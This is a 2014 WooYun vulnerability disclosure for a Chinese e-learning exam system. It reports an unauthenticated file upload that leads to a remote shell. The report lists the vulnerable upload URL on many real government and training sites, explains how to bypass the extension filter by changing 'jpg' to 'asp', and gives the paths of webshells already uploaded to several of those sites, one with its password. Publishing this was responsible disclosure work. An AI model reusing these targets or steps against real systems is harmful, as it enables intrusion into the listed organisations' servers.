当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075008

漏洞标题:某E-learning产品任意文件上传GetShell(无需登录)

相关厂商:上海天柏信息科技有限公司

漏洞作者:

提交时间:2014-09-04 12:56

修复时间:2014-12-03 12:58

公开时间:2014-12-03 12:58

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-04: 细节已通知厂商并且等待厂商处理中
2014-09-09: 厂商已经确认,细节仅向厂商公开
2014-09-12: 细节向第三方安全合作伙伴开放
2014-11-03: 细节向核心白帽子及相关领域专家公开
2014-11-13: 细节向普通白帽子公开
2014-11-23: 细节向实习白帽子公开
2014-12-03: 细节向公众公开

简要描述:

据说是市场上最畅销的E-learning产品,用户超5000家
上个漏洞提交后进行复测,发现存在另外一处上传,虽然有限制,但是可以绕过,且无需登录,并且影响多数政府案例

详细说明:

WooYun: 某E-learning产品内置账号可操作任意用户及添加管理员/任意文件上传GetShell
上个漏洞搜索引擎语法以及案例都提供了,这次就不再列举了....也走前台吧
上海天柏信息科技有限公司 官网:http://www.timber2005.com/
成功案例:http://www.timber2005.com/Customer.html
产品:天柏在线考试系统(政府版)
部分实例仅供cncert国家互联网应急中心测试:
http://px3.timber2005.com/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 官网demo
http://www.fjforestry.gov.cn:38501/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 福建省林业厅
http://www.52edu.org/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 天柏学习社区
http://www.frpx.cn/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 斐然公务员培训
http://218.70.91.227/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 重庆市卫生监督网络培训平台
http://xuexi.jxgh.org.cn//GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 江西省总工会在线培训学习系统
http://px.mqxwdx.cn/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 民勤县干部在线学习中心
http://360-sem.net/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 新加坡校园信息管理
http://12306.gov.cn/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 盐山县干部培训学分制管理网
http://www.bjlfzg.com/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 新加坡校园信息管理
http://218.106.254.26:801/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 北京天正合商业秘密保护咨询服务中心
http://ce.gtxwdx.cn/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)%20%E6%96%90%E7%84%B6%E5%85%AC%E5%8A%A1%E5%91%98%E5%9F%B9%E8%AE%AD
中共高台县委党校在线学习系统

漏洞证明:

实例演示
直接访问:
http://www.fjforestry.gov.cn:38501/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 选择从本地上传,去掉勾选自动重命名

b1.jpg


限制了上传格式,不过可以绕过,将type=jpg修改为asp

b2.jpg


上传后响应中返回了路径:

b3.jpg


http://www.fjforestry.gov.cn:38501/Upload/GovCwImg//yan.asp

b4.jpg


再示例3个
http://www.frpx.cn/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)
http://www.frpx.cn/Upload/GovCwImg//yan.asp 密码:pass

b6.jpg


http://218.70.91.227/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)
http://218.70.91.227/Upload/GovCwImg//yan.asp

b7.jpg


http://ce.gtxwdx.cn/GovUserControl/FileUpLoad.aspx?type=asp%2cjpeg%2cbmp%2cgif%2cpng&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu+Sep+04+2014+10%3a42%3a43+GMT%2b0800+(%u4e2d%u56fd%u6807%u51c6%u65f6%u95f4)+%u6590%u7136%u516c%u52a1%u5458%u57f9%u8bad
http://ce.gtxwdx.cn/Upload/GovCwImg//yan.asp

b9.jpg


我之前提供的关键词可能不是较为准确..,不过量确实是大的

修复方案:

先下发涉及的站点吧..

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-09 08:54

厂商回复:

最新状态:

暂无